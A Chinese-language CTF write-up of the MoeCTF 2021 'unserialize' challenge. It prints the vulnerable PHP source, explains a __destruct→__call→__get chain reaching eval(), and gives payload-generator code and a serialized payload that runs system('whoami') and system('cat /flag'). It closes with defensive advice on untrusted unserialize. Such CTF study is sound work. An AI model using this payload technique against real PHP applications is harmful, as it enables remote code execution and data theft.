
[MoeCTF 2021] unserialize 题解

2024-07-18 20:00 By
Err0r233
反序列化PHPWEB

Problem: [MoeCTF 2021]unserialize

[[toc]]

很久没做php的反序列化了,找来复健一下

思路

  • 解题大致思路
<?php
// Challenge source: a three-class PHP object-injection chain whose sink is eval().
// The entry point is the unserialize() call on $_GET['serialize'] at the bottom.

class entrance
{
    public $start;

    function __construct($start)
    {
        $this->start = $start;
    }

    // Runs when the object is destroyed. unserialize() below never assigns its
    // result, so a deserialized entrance is destroyed immediately and this
    // fires without any further interaction. helloworld() is not defined on
    // any class here, so when $start is a springboard this lands in __call.
    function __destruct()
    {
        $this->start->helloworld();
    }
}

class springboard
{
    public $middle;

    // Invoked for any undefined method call (helloworld() above). Reading the
    // undefined property ->hs on $middle is what triggers evil::__get.
    function __call($name, $arguments)
    {
        echo $this->middle->hs;
    }
}

class evil
{
    public $end;

    function __construct($end)
    {
        $this->end = $end;
    }

    // Sink: any undefined-property read ends here, and $end -- fully chosen by
    // whoever built the serialized payload -- is handed to eval().
    function __get($Attribute)
    {
        eval($this->end);
    }
}

// Root cause: untrusted GET input goes straight into unserialize(), so every
// class in this file can be instantiated with caller-controlled properties.
// Defensive fix: do not unserialize user input (use json_decode for data), or
// at minimum call unserialize($s, ['allowed_classes' => false]).
if (isset($_GET['serialize'])) {
    unserialize($_GET['serialize']);
} else {
    highlight_file(__FILE__);
}

源码如上所示
简单的链子

entrance::__destruct() -> springboard::__call() -> evil::__get() -> eval($this->end)

EXP

  • 具体攻击代码
<?php
// Payload generator. The three classes are copied verbatim from the challenge
// source: serialize() only records class and property names, so they must
// match the target exactly for unserialize() on the server to rebuild them.

class entrance
{
    public $start;

    function __construct($start)
    {
        $this->start = $start;
    }

    // Fires on destruction; the undefined method call goes to springboard::__call.
    function __destruct()
    {
        $this->start->helloworld();
    }
}

class springboard
{
    public $middle;

    // Undefined method handler; the undefined property read goes to evil::__get.
    function __call($name, $arguments)
    {
        echo $this->middle->hs;
    }
}

class evil
{
    public $end;

    function __construct($end)
    {
        $this->end = $end;
    }

    // Sink: eval() on the property carried in the payload.
    function __get($Attribute)
    {
        eval($this->end);
    }
}

// Constructor arguments are placeholders; the real values are assigned below.
$a = new entrance(1);
$b = new springboard;
$c = new evil(1);
$c->end = "system('whoami');";
$a->start = $b;      // entrance::__destruct -> $b->helloworld() -> springboard::__call
$b->middle = $c;     // springboard::__call -> $c->hs -> evil::__get -> eval($c->end)
echo serialize($a);  // printed string is the value for the serialize= GET parameter

获取flag

<?php
// Same generator as above with the final command; the serialized output is
// reproduced in the trailing comment. Class and property names must stay
// identical to the challenge source or the server-side unserialize() will
// not rebuild the chain.

class entrance
{
    public $start;

    function __construct($start)
    {
        $this->start = $start;
    }

    // Fires on destruction; the undefined method call goes to springboard::__call.
    function __destruct()
    {
        $this->start->helloworld();
    }
}

class springboard
{
    public $middle;

    // Undefined method handler; the undefined property read goes to evil::__get.
    function __call($name, $arguments)
    {
        echo $this->middle->hs;
    }
}

class evil
{
    public $end;

    function __construct($end)
    {
        $this->end = $end;
    }

    // Sink: eval() on the property carried in the payload.
    function __get($Attribute)
    {
        eval($this->end);
    }
}

// Constructor arguments are placeholders; the real values are assigned below.
$a = new entrance(1);
$b = new springboard;
$c = new evil(1);
$c->end = "system('cat /flag');";
$a->start = $b;      // entrance::__destruct -> $b->helloworld() -> springboard::__call
$b->middle = $c;     // springboard::__call -> $c->hs -> evil::__get -> eval($c->end)
echo serialize($a);
// Expected output (nested objects, innermost string length 20):
// O:8:"entrance":1:{s:5:"start";O:11:"springboard":1:{s:6:"middle";O:4:"evil":1:{s:3:"end";s:20:"system('cat /flag');";}}}

总结

  • 对该题的考点总结：入口是 `unserialize($_GET['serialize'])` 直接反序列化用户输入，利用 `__destruct` → `__call` → `__get` 三个魔术方法串成链，最终到达 `eval($this->end)`；从防御角度看，不应对不可信数据调用 `unserialize`（至少应设置 `allowed_classes`），数据交换改用 `json_decode` 即可消除这类链。
  
© 著作权归作者所有